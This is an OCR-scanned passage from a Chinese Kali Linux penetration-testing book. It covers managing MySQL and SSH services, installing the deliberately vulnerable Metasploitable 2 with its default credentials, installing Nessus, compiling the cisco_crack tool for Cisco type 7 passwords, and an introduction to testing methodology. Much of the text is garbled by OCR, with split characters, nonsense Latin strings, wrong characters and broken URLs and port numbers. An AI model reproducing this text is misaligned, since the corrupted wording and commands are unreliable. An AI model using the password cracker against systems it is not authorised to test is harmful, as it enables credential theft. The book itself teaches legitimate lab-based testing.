(RDBMS) 。 人 们 通常 会 使 用 Apache 服 务 器 执行 PHP 程 序 ， 并 通过 

PHP 程 序 调用 MySQL; 以 这 种 配置 组 合 来 创建 动态 的 Web 应 用 服务 程 
序 。 就 渗透 测试 的 工作 而 言 ， 您 可 以 把 渗透 测试 的 测试 结果 存储 到 
MySQL 服 务 器 里 。 例 如 ， 可 以 用 MySQL 数 据 保存 漏洞 信息 和 网 络 映射 
的 分 析 结 果 。 当 然 ， 这 需要 您 首先 启用 这 个 程序 。 

启动 Kali Linux 自 带 的 MySQL 服务 的 操作 步骤 如 下 。 

1. WARM SE TÉ S HI MySQL ARS, ERKE RAKARE 
中 Kali Linux | System Service | MySQL | mysql start。 如果 要 通过 命令 行 
局 动 它 ， 可 在 终端 窗口 里 输入 下 述 指令 : 

service mysql start 

2. RARE PUR Nf s. ° 


[ ok ] Starting MySQL database server: mysqld . . .. 


[info] Checking for tables which need an upgrade, are corrupt or were 
not closed cleanly.. 

3. 如 需 测试 MySQL 的 工作 状态 是 否 正 党， 可 使 用 MySQL 客 户 端 
登录 到 服务 器 。 我 们 使 用 用 户 名 (root) 和 密码 登录 MySQL 服 务 器 。 

mysql —u root -p 

4. 系统 会 返回 下 壕 啊 应 信息 。 

Enter password: 

Welcome to the MySQL monitor. Commands end with ; or \g. 

Your MySQL connection id is 42 

Server version: 5.5.30-1 (Debian) 

Copyright (c) 2000, 2013, Oracle and/or its affiliates. All rights 


reserved. 


Oracle is a registered trademark of Oracle Corporation and/or its 
affiliates. Other names may be trademarks of their respective owners. 

Type "help;" or "h" for help. Type "c" to clear the current input 
statement. 

mysql> 

5. 您 可 以 在 MySQL 的 提示 符 下 直接 使 用 SQL 命令 。 如 需 退 出 
MySQL 客 户 端 程序 ， 请 使 用 quit 命 令 。 

出 于 安全 性 的 考虑 ， 默 认 情 况 下 ， 只 能 从 本 机 访问 Kali Linux 系 统 
里 的 MySQL 服务 。 如 需 调 整 这 个 设置 ， 请 修改 配置 文 
件 /etc/mysql/my.cnf 里 的 bind-address 语 句 。 除 非 需要 从 其 他 主机 访问 
MySQL 服 务 ， 否 则 我 们 建议 您 不 要 修改 它 。 

停止 MySQL 服 务 的 操作 步骤 如 下 。 

1. 如 果 要 通过 桌面 沫 单 停 目 MySQL 服务 ， 可 在 桌面 沫 单 中 依次 选 
中 Kali Linux | System Service | MySQL | mysql stop。 如 果 要 通过 命令 行 
停止 它 ， 可 在 终端 窗口 里 输入 下 述 指令 。 

service mysql stop 

2. AAAI Pg fe ° 

[ ok ] Stopping MySQL database server: mysqld. 

下 述 指 令 可 使 Kali Linux 系统 在 局 动 过 程 中 目 动 局 动 MySQL Ak 


Z o 
update-rc.d mysql defaults 
这 条 指令 将 把 MySQL 服 务 添加 到 目 动 启动 的 程序 组 里 。 
1.7.3 SSH 
SSH 的 全 称 是 Secure Shell。 它 是 目前 较为 可 徘 的 专 为 远程 登录 会 
话 和 其 他 网 络 服 务 提供 安全 性 的 协议 。 除 了 远程 登录 的 服务 功能 以 


外 ， 它 还 有 很 多 功能 ， 它 支持 在 主机 间 安 全 地 传递 文件 、 在 远程 主机 
上 执行 命令 ， 以 及 X11 (Linux 的 桌面 ) 会 话 转 发 等 。 

管理 SSH 服 务 的 操作 步骤 如 下 。 

1. 如 果 要 从 桌面 沫 单 启动 SSH 服务 ， 可 在 桌面 菜单 中 依次 选中 
Kali Linux | System Service | SSH | sshd start。 如 果 要 通过 命令 行 局 动 
它 ， 可 在 终端 窗口 里 输入 下 述 指令 。 

service ssh start 

2. AAAI] P URN fs ° 

[ ok ] Starting OpenBSD Secure Shell server: sshd. 

3. 如 需 测试 SSHD 的 工作 状态 是 否 正 常 ， 可 以 在 其 他 主机 上 使 用 
SSH 客 户 端 登 示 到 服务 硕 。 如 采 您 使 用 的 是 Microsoft Windows 系统 ， 
可 以 使 用 putty 进行 测试 。 下 载 putty 的 官方 网 站 是 
http://www.chiark.greenend.org.uk/~sgtatham/putty/ ° 

4. WOR EDBITGIESERIEIESSHDHRS, FY ERS BP Rt 
FF Kali Linux | System Service | SSH | sshd stop。 如 果 要 通过 命令 行 停止 
它 ， 可 在 终端 窗口 里 输入 下 述 指令 。 

service ssh stop 

5. RARE, Pati Sr fei As ° 

[ ok ] Stopping OpenBSD Secure Shell server: sshd. 

6. 下 述 指 令 可 使 Kali Linux 系统 在 局 动 过 程 中 目 动 局 动 SSH Ak 
务 。 


update-rc.d ssh defaults 
这 条 指令 将 把 SSH 服 务 添加 到 上 自动 启动 的 程序 组 里 。 


1.8 安装 脆弱 系统 


我 们 在 本 节 安 装 渗透 和 测试 的 目标 一 一 一 台 存 在 很 多 漏洞 的 虚拟 
主机 。 本 书 很 多 章节 里 的 特定 主题 都 涉及 这 人 台 脆 弱 系统 (vulnerable 
server) 。 在 法 律 许可 的 范围 之 内 ， 我 们 不 可 以 攻击 任何 在 Intemet 上 的 
存在 漏洞 的 真实 主机 ， 所 以 我 们 必须 使 用 自己 安装 的 脆弱 系统 。 我 们 
在 此 强调 ， 除 韭 有 对 方 的 书面 许可 ， 否 则 决 不 可 以 渗透 或 测试 他 人 的 
主机 。 此 外 ， 我 们 希望 您 能 够 在 自己 搭建 的 环境 中 提高 渗透 拉 能 。 当 
攻击 没有 达到 预期 成 效 时 ， 只 要 渗透 环境 完全 可 控 ， 您 束 可 以 轻易 地 
检查 目标 主机 的 情况 ， 从 而 找到 失败 的 原因 。 

在 很 多 国家 ， 只 要 目标 主机 不 是 您 自己 的 ， 哪 怕 您 对 其 进行 端口 
扫描 都 会 被 认为 是 犯罪 。 而 且 ， 只 要 使 用 虚拟 机 作为 目标 主机 ， 即 使 
它 发 生 了 故障 ， 我 们 也 能 很 快 将 其 修复 。 

我 们 将 在 虚拟 机 里 安装 Metasploitable 2， 用 它 作 为 我 们 的 脆弱 系 
统 。Metasploitable 的 研发 团队 是 Rapid7 旗下 著名 的 HD Moore 。 

除了 Metasploitable 2 之 外 ， 还 有 很 多 可 用 于 搭建 渗透 测试 环境 的 脆 
弱 系 统 。 详 情 请 参见 : http://www.felipemartins.info/2011/05/pentesting 


vulnerable-study-frameworks-complete-list/ ° 

无 论 是 操作 系统 、 网 络 ， 还 是 Web 应 用 服务 方面 ，Metasploitable 2 
都 有 非常 多 的 漏洞 和 问题 。 

有 关 这 些 漏 洞 的 详细 情况 ， 请 参见 Rapid 7 的 官方 网 站 : 
https://community.rapid7.com/docs/DOC-1875 ° 

f£ VirtualBox 里 安装 Metasploitable 2 的 操作 步骤 如 下 ° 

1. 从 网 络 上 下 载 Metasploitable2 的 虚拟 机 镜像 文件 。 该 网 站 网 址 
是 http://sourceforge. net/projects/metasploitable/files/Metasploitable2/ ° 

2. 解压 缩 下 载 的 ZIP 文件 。 每 解压 缩 Metasploitable 2 的 ZIP 文 件 之 
后 ， 您 将 看 到 5 个 文件 。 

o Metasploitable.nvram 


o Metasploitable.vmdk 


o Metasploitable.vmsd 

o Metasploitable.vmx 

o Metasploitable.vmxf 

3. 在 VirtualBox 里 创建 一 个 虚拟 机 。 本 例 设置 这 个 虚拟 主机 的 名 
称 n 为 Metasploitable 2， 并 设置 操作 系统 为 Linux 一 Ubuntu ° 

给 这 个 虚拟 主机 分 配 1024MB 内 存 。 

5. Ec Hard Disk 设 置 里 ， 选 择 Use existing hard disk， 然 后 选 

中 我 们 先前 解压 缩 出 来 的 Metasploitable 文 件 〈 见 图 1.33) ° 
Kx) Create New Virtual Machine 


Virtual Hard Disk 


If you wish you can now add a start-up disk to the new machine. You can either 
create a new virtual disk or select one from the list or from another location 
using the folder icon. 


If you need a more complex virtual disk setup you can skip this step and make 
the changes to the machine settings once the machine is created. 


The recommended size of the start-up disk is 8,00 GB. 
[V] Start-up Disk 
© Create new hard disk 
© Use existing hard disk 


Metasploitable.vmdk (Normal, 8,00 GB) xj @ 


图 1.33 
6. 修改 联网 类 型 为 Host-only adapter， 以 保证 这 人 台 虚 拟 主机 服务 器 
同时 可 被 物理 主机 和 Kali Linux 主机 访问 。 我 们 还 要 修改 Kali Linux 的 
虚拟 主机 ， 把 它 的 联网 类 型 也 改 为 Host-only adapter ° 


7. 启动 虚拟 主机 Metasploitable 2。 竺 完成 店 动 过 程 之 后 ， 您 可 使 
用 下 述 信 息 登 录 Metasploitable 2 的 终端 。 

o 用 户 名 : msfadmin 

o 密码 : msfadmin 
8. 登录 成 功 之 后 ，Metasploitable 2 的 终端 窗口 如 图 1.34 所 示 。 


ted twork 


msfdevula 


图 1.34 


虽然 最 新 版 本 的 Kali Linux 带 有 大 量 的 安全 工具 ， 但 是 由 于 以 下 原 
因 ， 您 可 能 还 会 需要 从 软件 仓库 之 外 安装 程序 : 

e Kali Linux 所 采纳 的 版 本 ， 可 能 不 钙 该 软件 的 最 新 版 ; 

e Kali Linux 的 软件 仓库 (repository) 可 能 没有 收 系 您 所 需要 的 软 
ne 

我 们 的 建议 是 首先 在 软件 仓库 里 搜索 软件 。 如 果 软 件 仓库 里 有 您 
所 需要 的 软件 ， 就 通过 软件 仓库 安装 该 软件 。 如 果 在 软件 仓库 里 找 不 
到 该 软件 ， 您 可 能 就 不 得 不 从 软件 作者 的 网 站 下 载 并 安装 它 。 


我 们 的 经 验 表 明 ， 您 应 当 尽 量 通 过 软件 仓库 安装 软件 。 这 样 一 
来 ， 您 就 不 必 关 注 软件 管理 〈 主 要 是 更 新 ) 的 那些 繁琐 事项 。 

Debian 系 统 有 很 多 可 助 您 管理 软件 包 的 程序 ， 例 如 dpkg、apt 和 
aptitude 程 序 。 按 照 默认 方式 安装 的 Kali Linux 会 带 有 dpkg Mapt 程序 。 

如 需 了 解 apt 和 dpkg 人 命令 的 详细 信息 ， 请 参见 : 
https://help.ubuntu.com/community/A ptGet/Howto/ 和 http://www. 
debian.org/doc/manuals/debian-reference/ch02.en.html ° 

本 世 将 通过 几 个 与 安装 软件 包 有 关 的 实例 来 介绍 apt 命 令 。 

如 需 在 软件 仓库 中 查找 某 个 软件 包 的 名 称 ， 可 使 用 指令 : 

apt-cache search < 软件 包 和 名 称 > 

上 述 指 令 将 列 出 含有 “软件 包 和 名 称 * 的 全 部 软件 包 。 例 如 ， 我 们 可 
以 使 用 下 述 指令 搜索 一 个 叫做 nessus 的 软件 包 。 

apt-cache search nessus 

如 需 查看 软件 包 的 详细 信息 《描述 信息 、 软 件 包 大 小 和 版 本 等 信 
A) ， 可 使 用 命令 : 

apt-cache show < 软件 包 名 称 > 

如 果 决 定安 装 或 更 新 某 个 软件 ， 那 么 融 可 用 apt-get 命令 安装 该 软 
件 包 。apt-get 指 令 的 基本 用 法 是 : 
apt-get install < 软件 包 名 称 > 
如 果 您 未 能 在 Kali Linux 的 软件 仓库 里 找到 您 所 需要 的 软件 ， 并 且 
够 确定 它 日 后 不 会 对 系统 造成 不 民 影 响 ， 那 么 您 可 以 手动 安装 软 
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务必 从 可 信 的 软件 源 下 载 软件 ， 尽 量 从 软件 研发 团队 的 网 站 下 
载 。 如 果 人 研发 团队 提供 .deb 安 闭 包 (后缀 名 为 .deb 的 文件 是 Debian 的 安 
ROLF) ， 您 可 以 使 用 dpkg 命 令 安装 该 软件 包 。 如 果 他 们 没有 提 
供 .deb 安 装 包 ， 您 可 以 通过 源 代码 安装 该 软件 。 虽 然 实 际 情况 各 有 不 
同 ， 但 古 通 过 源 代码 安装 软件 的 方法 大 体 都 可 归纳 为 下 述 几 个 步 又 。 


1. 使 用 压缩 包 管理 软件 (例如 Tar 和 7-Zip) 解压 缩 软 件 包 。 

2. 进入 到 解压 缩 文件 所 在 的 目录 。 

3. 执行 指令 : 

./configure 

make 

make install 

本 书后 续 的 篇 幅 将 介绍 如 何 安装 没有 被 Kali 软 件 仓 库 收 录 的 软件 工 
o 我们 将 演示 以 下 两 种 软件 安装 软件 机 制 : 


X 


e 通过 Debian 安装 包 安 装 应 用 程序 ; 
e 通过 源 代码 安装 应 用 程序 。 


5 版 ，。 我 们 在 Kali Linux 的 软件 仓库 进行 过 相关 搜索 ， 并 没有 找到 这 个 
程序 。 

与 上 一 版 本 的 程序 相 比 ， 第 5 版 的 Nessus 的 程序 具有 更 多 功能 。 新 
版 程序 能 够 通过 更 为 详细 的 过 滤 规 则 整理 扫描 结果 ， 创 建 创建 更 为 灵 
活 的 扫描 报告 ， 而 且 简 化 了 扫描 策略 的 设置 过 程 。 因 此 我 们 不 再 使 用 
第 4 版 的 Nessus ° 

A TS I BE st hk Nessus 的 改进 之 处 ， 请 参见 : 
http://www.tenable.com/products/ nessus/ nessus-product- overview/why- 
upgrade to-nessus-5 ° 

我 们 可 以 访 间 Ness 的 官方 网 站 

(http://www.nessus.org/products/nessus/nessus-download- agreement) , 

并 下 载 其 针对 Debian 6 的 安装 包 。 然 后 ， 通 过 dpkg 指 令 安装 这 个 软件 
包 : 

dpkg -i Nessus-x.y.z-debian6 i386.deb 


在 这 个 指令 里 ，x.y.z 代表 Nessus 的 版 本 号 。 请 根据 下 载 文件 的 文 
件 名 进行 相应 殖 换 。 

接 下 来 ， 根 据 Nessus 安 装 程序 在 屏幕 上 的 提示 进行 相应 配置 。 

1. 您 可 通过 下 述 指令 局 动 Nessus 的 服务 端 程序 。 

/etc/init.d/nessusd start 

2. 使 用 浏览 器 访问 网 址 https://localhost:88834。 浏 览 器 会 提示 
Nessus 所 用 的 SSL 证 书 无 效 。 您 需要 检查 SSL 证 书 并 为 这 个 网 站 设置 例 
外 规则 。 处 理 过 SSL 证 书 问题 之 后 ， 您 将 看 到 Nessus 的 页 面 内 容 ， 如 图 
1.35 zm ° 

3. 上 图 1.35 所 示 的 界面 会 引导 您 设置 Nessus 的 管理 员 账 号 。 而 


后 ， 它 要 求 您 输入 Nessus 扫 描 程 序 的 激活 码 。 您 可 在 官方 网 站 
(http:/www.nessus.org/register/) 进行 注册 ， 从 而 获取 启动 程序 所 需 的 
激活 码 ( 见 图 1.36) ° 


a | @ ntt; localhost: 88 34/register 


ees 


Thank you for installing Nessus, the world leader in vulnerability scanners. Nessus will allow you to perform: 


* High-speed vulnerability discovery, to determine which hosts are running which services 

es Agentless auditing, to make sure no host on your network is missing security patches 

+ Compliance checks, to verify and prove that every host on your network adheres to the security policy you defined 
es Scan scheduling, to automatically run scans at the frequency you select 

e And more! 


During the next steps, we are going to create an administrative account and register your scanner with a Plugin Feed, 
which we will download. You will need an Activation Code before you can use Nessus; if you do not have an Activation 
Code already, please go to http://www.nessus.org/register/ to get one now. 


Get started > 


图 1.35 


localhost: 88 34/r« 


E , 
ness 


Successfully registered the scanner with Tenable. 
Successfully created the user. 


Next: Download plugins > 


图 1.36 
.您 只 有 在 成 功 注册 之 后 才能 下 载 并 使 用 最 新 的 Nessus 组 件 。 下 
E a 您 可 以 充分 利用 这 个 时 间 做 些 其 他 事 


1.9.2 3€ Cisco! L 


在 第 二 个 实例 里 ， 我 们 将 安装 一 个 名 为 cisco. crack 的 密码 破解 工 

。 它 主要 用 来 破解 Cisco 配置 文件 中 的 type 7 类 型 密码 。 我 们 可 以 在 

网 站 下 载 它 的 源 代 码 ， 该 网 站 网 址 是 http:/ 
A html ° 

Cisco 配置 文件 中 的 type 7 类 型 密码 ， 其 加 密 强 度 相 当 弱 ， 所 以 应 
当 避 免 使 用 这 种 类 型 的 密码 。 虽 然 此 类 密码 已 经 很 少 抑 了 ， 但 是 还 是 
有 些 设备 在 使 用 这 种 密码 。 在 这 种 情况 下 ，Cisco Crack 这 类 工具 将 会 
派 得 上 用 场 。 


下 载 了 源 代码 之 后 ， 下 一 个 步骤 吏 是 编译 源 代 码 。 在 开始 编译 它 

之 有 前， 您 需要 在 原文 件 里 添加 两 条 include 语 句 : 

#include <string.h> 

#include <stdlib.h> 

现在 ， 这 个 源 代码 文件 应 该 有 4 条 include 语 句 。 

我 们 使 用 下 述 命令 编译 程序 的 源 代 码 。 

gcc cisco crack.c —o cisco crack 

如 采编 译 成 功 ， 将 会 产生 一 个 名 为 cisco crack 的 可 执行 文件 。 我 
们 可 以 通过 下 述 指令 查看 它 的 帮助 信息 。 


# ./cisco_crack -h 


Usage: ./cisco_crack -p <encrypted password> 


./cisco_crack <router config file> <output file> 
1.10 本 章 总 结 


本 章 带 您 步 入 Kali Linux 的 奇妙 世界 。 您 可 以 在 实地 的 渗透 测试 工 
作 中 直接 使 用 其 独到 的 Live DVD 系统 。Kali 的 前 映 是 BackTrack 一 一 一 
个 非常 著名 的 主攻 渗透 测试 的 Linux 发 行 版 。 

本 章 首 先 介绍 了 Kali Linux 的 简 史 ， 然 后 介绍 了 它 的 主要 功能 。 最 
新 版 本 的 Kali Linux 自 带 有 很 多 可 用 于 渗透 测试 的 软件 工具 。 除 了 渗透 
功能 之 外 ，Kali Linux 还 可 用 于 电子 取证 、 无 线 安全 研究 、 逆 向 工程 和 
硬件 破解 。 

在 此 基础 上 ， 本 章 介 绍 了 安装 Kali Linux 的 多 种 方法 。 虽 然 无 需 安 
"Kali Linux 系统 就 可 以 把 它 直接 当 作 Live DVD 使 用 ， 但 是 我 们 也 可 
以 把 它 安装 到 硬盘 上 上， 甚至 是 USB 内 存 里 。 当 我 们 把 它 安装 到 USB N 
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在 使 用 Kali Linux 开始 做 渗透 测试 之 前 ， 您 还 需要 设置 好 或 有 线 或 
无 线 的 网 络 连接 。 我 们 还 介绍 了 VirtualBox 虚拟 机 系统 的 一 些 特性 ， 
包括 安装 虚拟 机 客户 端 功 能 增强 包 ， 设 置 文件 夹 共享 ， 导 出 虚拟 机 和 
快照 备份 。 

因为 Kali Linux 整合 了 损 作 系统 以 外 的 一 些 软件 ， 所 以 在 必要 的 时 
候 需要 进行 系统 更 新 。 我 们 可 以 单独 更 新 应 用 程序 ， 也 可 以 连同 Linux 
内 核 一 并 更 新 。 

您 可 能 需要 进行 一 些 渗透 测试 方面 的 练习 。 但 是 在 多 数 国家 里 ， 
未 经 许可 就 渗透 他 人 的 服务 器 是 违法 行为 。 为 了 满足 教学 的 需要 ， 人 人 
们 刻意 单独 研发 出 了 多 种 脆弱 系统 种 含有 很 多 漏洞 的 虚拟 主 
机 。 您 可 以 在 虚拟 机 里 安装 脆弱 系统 ， 以 进行 渗透 测试 的 练习 。 本 文 
推荐 的 脆弱 系统 是 Rapid7 推出 的 Metasploitable 2。 

Kali Linux 系统 目 市 有 多 种 网 络 应 用 服务 ， 我 们 选取 了 HTTP ` 
MySQL 和 SSH 进行 介绍 。 具 体 来 讲 ， 相 关内 容 都 由 简介 和 管理 服务 

(例如 启动 和 停止 服务 的 方法 ) 的 篇 幅 组 成 。 

在 本 章 的 最 后 ， 我 们 演示 了 安装 Nessus 网 络 扫描 程序 和 Cisco 密 码 
破解 工具 的 过 程 ， 介 绍 了 如 何 安装 没有 被 Kali Linux 收录 的 信息 安全 工 
H o 

在 下 一 章 ， 我 们 将 探讨 渗透 测试 的 方法 学 理论 。 


第 2 章 渗透 测试 方法 论 


渗透 测试 (penetration testing, pentest) 是 实施 安全 评估 (Ble 
i) 的 具体 手段 。 方 法 论 是 在 制定 、 实 施 信 息 安 全 审计 方案 时 ， 需 要 
遵循 的 规则 、 和 惯例 和 过 程 。 和 人们 在 评 佑 网络、 应用、 系统 或 三 者 组 合 
的 安全 状况 时 ， 不 断 摸索 各 种 务实 的 理念 和 成 熟 的 做 法 ， 并 总 结 出 了 


一 套 理论 一 -测试 方法 论 。 本 章 简要 介绍 了 渗透 测试 方法 论 的 各 关键 
要 点 ， 涉 及 的 主题 包括 ; 

e 两 种 广 为 认 知 的 渗透 测试 类 型 一 一 黑 盒 测 试 和 白 盒 测试 ; 

e 漏洞 评估 和 渗透 测试 的 区 别 ; 

e 业界 普遍 采纳 的 安全 测试 方法 论 ， 以 及 其 核心 功能 、 特 征 和 优 
35; 

e 典型 的 渗透 测试 所 涉及 的 10 个 阶段 ; 

e 安全 测试 的 道德 准则 。 

渗透 测试 可 能 是 单独 进行 的 一 项 工作 ， 也 可 能 是 常规 研发 生命 周 
期 (例如 ，Microsoft SDLC) 里 代 安 全 风险 管理 的 一 个 组 成 部 分 。 产 
品 的 安全 性 并 不 完全 取决 于 I 方面 的 技术 因素 ， 还 会 受到 与 该 产品 有 
天 的 最 佳 安全 实践 的 影响 。 具 体 而 言 ， 增 强 产 品 安全 性 的 工作 涉及 安 
全 需求 分 析 、 风 险 分 析 、 威 胁 建 模 、 代 码 审 查 和 运营 安全 。 

通常 认为 ， 渗 透 测 试 是 安全 评估 最 终 的 也 是 最 具 侵 犯 性 的 形式 ， 
它 必须 由 符合 资质 的 专业 人 士 实 施 。 在 进行 评估 之 前 ， 有 天 人 员 可 能 
了 解 也 可 能 不 了 解 目 标的 具体 情况 。 渗 透 测试 可 用 于 评估 所 有 的 IT 基 
础 设施 ， 包 括 应 用 程序 、 网 络 设备 、 操 作 系统 、 通 信 设 备 、 物 理 安 全 
和 人 类 心理 学 。 渗 透 测试 的 工作 成 采 融 是 一 份 渗透 测试 报告 。 这 种 报 
告 分 为 多 个 部 分 阅 述 在 当前 的 目标 系统 里 找到 的 安全 弱点 ， 并 且 会 讨 
论 可 行 的 对 抗 措施 和 其 他 改进 建议 。 充 分 应 用 渗透 测试 方法 论 ， 有 助 
于 测试 人 员 在 渗透 测试 的 各 个 阶段 深入 理解 并 透彻 分 析 当 前 存在 的 防 
御 措施 。 


2.1 渗透 测试 的 种 类 


虽然 渗透 测试 各 种 各 样 ， 但 是 业内 普遍 将 其 划分 为 两 类 : AAM 
试 和 黑 盒 测试 。 


2.1.1 BEM 

在 进行 墨盒 测试 时 ， 安 全 审计 员 在 不 清楚 被 被 测 单位 的 内 部 技术 
构造 的 情况 下 ， 从 外 部 评估 网 络 基础 设施 的 安全 性 。 在 渗透 测试 的 各 
个 阶段 ， 黑 盒 测 试 借助 真实 世界 的 墨客 技术 ， 桑 露出 目标 的 安全 问 
题 ， 甚 至 可 以 揭露 尚未 被 他 人 利用 的 安全 弱点 。 渗 透 测试 人 员 应 能 理 
解 安全 弱点 ， 将 之 分 类 并 按照 风险 级 别 〈 高 、 中 、 低 ) 对 其 排序 。 通 
第 来 说 ， 风 险 级 别 取 决 于 相关 弱点 可 能 形成 的 危害 的 大 小 。 老 练 的 渗 
透 测 试 专家 应 能 确定 可 引发 安全 事故 的 所 有 攻击 模式 。 当 测试 人 员 完 
成 黑 盒 测试 的 所 有 测试 工作 之 后 ， 他 们 会 把 与 测试 对 象 安全 状况 有 关 
的 必要 信息 进行 整理 ， 并 使 用 业务 的 语言 描述 这 些 被 识别 出 来 的 风 
险 ， 继 而 将 之 汇总 为 书面 报告 。 黑 盒 测 试 的 市 场 报 价 通 常会 高 于 白 盒 
测试 。 


2.1.2 HAM: 

盒 测试 的 审计 员 可 以 获取 被 测 单位 的 各 种 内 部 资料 甚至 不 公开 
资料 ， 所 以 渗透 测试 人 员 的 视野 更 为 开阔 。 帮 以 日 盒 测 试 的 方法 评 佑 
安全 漏洞 ， 测 试 人 员 可 以 以 最 小 的 工作 量 达 到 最 高 的 评估 精确 度 。 白 
盒 测试 从 被 测 系 统 环境 自身 出 发 ， 全 面 消 除 内 部 安全 问题 ， 从 而 增加 
了 从 单位 外 部 渗透 系统 的 难度 。 黑 盒 测 试 起 不 到 这 样 的 作用 。 白 盒 测 
试 所 需 的 步骤 数目 与 黑 盒 测试 不 相 上 下 。 男 外 ， 若 能 将 白 盒 测 试 与 常 
规 的 研发 生命 周期 相 结合 ， 束 可 以 在 入 侵 者 发 现 甚至 利用 安全 弱点 之 
前 ， 尽 可 能 最 早 地 消除 全 部 安全 隐患 。 这 使 得 白 盒 测试 的 时 间 、 成 
本 ， 以 及 发 现 、 解 决 安全 弱点 的 技术 门槛 都 全 面 低 于 墨盒 测试 。 


2.2 脆弱 性 评估 与 渗透 测试 


正确 地 理解 和 使 用 安全 评估 领域 的 技术 术语 十 分 必要 。 在 您 的 职 
业 生 涯 中 ， 您 可 能 时 常会 遇 到 那些 不 了 解 行 业 术 语 ， 却 需要 从 这 些 专 
用 名 词 里 选 一 个 进行 采购 的 人 。 其 实 商业 公司 和 非 商 业 机 构 里 大 有 这 
样 的 人 在 。 至 少 您 应 该 明日 这 些 类 型 的 测试 各 是 什么 。 

脆弱 性 评估 通过 分 析 企 业 资产 面临 威胁 的 情况 和 程度 ， 评 估 内 部 
和 外 部 的 安全 控制 的 安全 性 。 这 种 技术 上 的 信息 系统 评估 ， 不 仅 要 揭 
露 现 有 防范 措施 里 存在 的 风险 ， 而 且 要 提出 多 重 备 选 的 补救 案 略 ， 并 
将 这 些 策略 进行 比较 。 内 部 的 脆弱 性 评估 可 保证 内 部 系统 的 安全 性 ， 
而 外 部 的 脆弱 性 评估 则 用 于 验证 边界 防护 (perimeter defenses) 的 有 效 
性 。 无 论 进 行内 部 脆弱 性 评估 还 是 进行 外 部 脆弱 性 评估 ， 评 估 人 员 都 
会 采用 各 种 攻击 模式 严格 测试 网 络 资产 的 安全 性 ， 从 而 验证 信息 系统 
处 理 安 全 威胁 的 能 力 ， 进 而 确定 应 对 措施 的 有 歼 性 。 不 同类 型 的 脆弱 
性 评估 需要 的 测试 流程 、 测 试 工具 和 目 动 化 测试 技术 也 不 相同 。 这 可 
以 通过 一 体 化 的 安全 弱点 管控 (vulnerability management) 平台 来 实 
现 。 现 在 的 安全 弱点 管控 平台 带 有 可 自动 更 新 的 漏洞 数据 库 ， 能 够 测 
试 不 同类 型 的 网 络 设备 ， 而 且 不 会 影响 配置 管理 和 变更 管理 的 完整 
性 。 

脆弱 性 评 佑 和 渗透 测试 两 者 最 大 的 区 别 葡 是 : R3 RAIN DORIA 
别 目标 的 弱点 ， 它 还 涉及 在 目标 系统 上 进行 漏洞 利用 、 权 限 提升 和 访 
问 维护 。 换 句 话 说 ， 脆 弱 性 评估 虽然 可 以 充分 发 现 系 统 里 的 缺陷 ， 但 
是 不 会 考虑 去 衡量 这 些 缺 陷 对 系统 造成 的 危害 。 男 外 ， 相 比 脆 弱 性 评 
估 ， 渗 透 测 试 更 倾向 于 入 侵 ， 会 刻意 使 用 各 种 技术 手段 利用 安全 漏 
ij; 所 以 渗透 测试 可 能 对 生产 环境 市 来 实际 的 破坏 性 有 影响。 而 脆弱 性 
评 佑 则 是 以 非 入 侵 性 的 方式 ， 定 性 、 定 量 地 识别 已 知 安全 弱点 。 

为 何 需 要 渗透 测试 ? 

如 果 不 能 确定 防火 墙 、IDS、 文 件 完 整 性 监控 等 风险 减缓 控制 的 实 
际 效果 ， 那 么 就 应 当 进 行 渗透 测试 。 虽 然 漏洞 扫描 (脆弱 性 评估 ) 能 


够 发 现 各 个 漏洞 ， 但 是 渗透 测试 则 会 验证 这 些 漏洞 在 实际 环境 里 被 利 
用 的 可 能 性 。 

有 些 观点 认为 ， 这 两 种 类 型 的 安全 评估 重复 性 很 高 ， 只 是 同义词 
而 已 。 这 种 观点 绝对 有 误 。 合 格 的 安全 顾问 会 根据 客户 的 商务 需求 ， 
选择 一 种 最 合适 的 安全 评估 向 顾客 推荐 ， 绝 对 不 会 把 不 同类 型 的 安全 
评 佑 混为一谈。 然而， 仔细 核实 安全 评估 项 目的 内 容 和 做 出 最 终 决 定 
确实 是 顾客 的 责任 。 

渗透 测试 的 价格 比 脆弱 性 评估 的 价格 要 高 。 


2.3 安全 测试 方法 论 


为 满足 安全 评估 的 相应 需求 ， 人 们 已 经 总 结 出 了 多 种 开源 方法 
论 。 无 论 被 评估 目标 的 规模 有 多 大 ， 复 洒 性 有 多 高 ， 只 要 应 用 这 些 安 
全 评估 的 方法 论 ， 束 可 以 策略 性 地 完成 各 种 时 间 要 求 苛 刻 、 富 有 挑战 
性 的 安全 评 佑 任务 。 某 些 方法 论 专注 于 安全 测试 的 技术 方面 ， 有 些 则 
天 注 管 理 领 域 。 只 有 极 少数 的 方法 论 能 够 同时 兼顾 技术 因素 和 管理 因 
素 。 在 评估 工作 中 实践 这 些 方法 论 ， 基 本 上 都 是 按部就班 地 执行 各 种 
测试 ， 以 精确 地 判断 被 测试 系统 的 安全 状况 。 

本 书 再 次 向 您 推荐 儿 种 著名 的 安全 评 佑 方法论。 本 章 将 重点 突出 
这 些 方法 论 的 关键 特征 和 优势 ， 硕 望 它 们 能 够 帮助 您 折 视 网 络 安全 和 
应 用 安全 评估 的 视野 。 

e 开源 安全 测试 方法 论 

e 信息 系统 安全 评估 框架 

e 开放 式 Web 应 用 安全 项 目 

e Web 应 用 安全 联合 威胁 分 类 

e 渗透 测试 执行 标准 


上 述 这 些 测试 框架 和 方法 论 ， 都 能 够 指导 安全 人 士 针 对 客户 需求 
制定 最 得 当 的 策略 。 其 中 ， 前 两 个 方法 论 所 提供 的 通用 原则 和 方法 ， 
几乎 可 以 指导 面向 任何 类 型 资产 的 安全 测试 。 由 OWASP (Open Web 
Application Security Project) 推出 的 测试 框架 主要 面向 应 用 安全 的 安全 
PF ° PTES (Penetration Testing Execution Standard) 能 够 指导 所 有 类 
型 的 渗透 测试 工作 。 然 而 需要 注意 的 是 ， 安 全 状态 本 身 是 一 个 持续 变 
化 的 过 程 ， 而 渗透 测试 只 能 够 获取 目标 系统 在 被 测试 的 那 一 时 刻 的 安 
全 状态 。 在 测试 的 过 程 中 ， 哪 怕人 被 测 的 信 筷 系统 发 生 了 细微 的 变化 ， 
都 可 能 影响 安全 测试 鸭 全 局 工作 ， 从 而 导致 最 终 的 测试 结 采 不 正确 。 
此 外 ， 单 一 的 测试 方法 论 并 不 一 定 能 够 泣 盖 风险 评 佑 工作 的 所 有 方 
面 。 而 拟定 适合 目标 网 络 和 应 用 环境 的 最 佳 测试 策略 ， 确 实 是 安全 审 
计 人 员 的 职责 。 

安全 测试 的 方法 论 有 很 多 。 要 选取 最 佳 的 指导 理论 ， 怠 需要 综合 
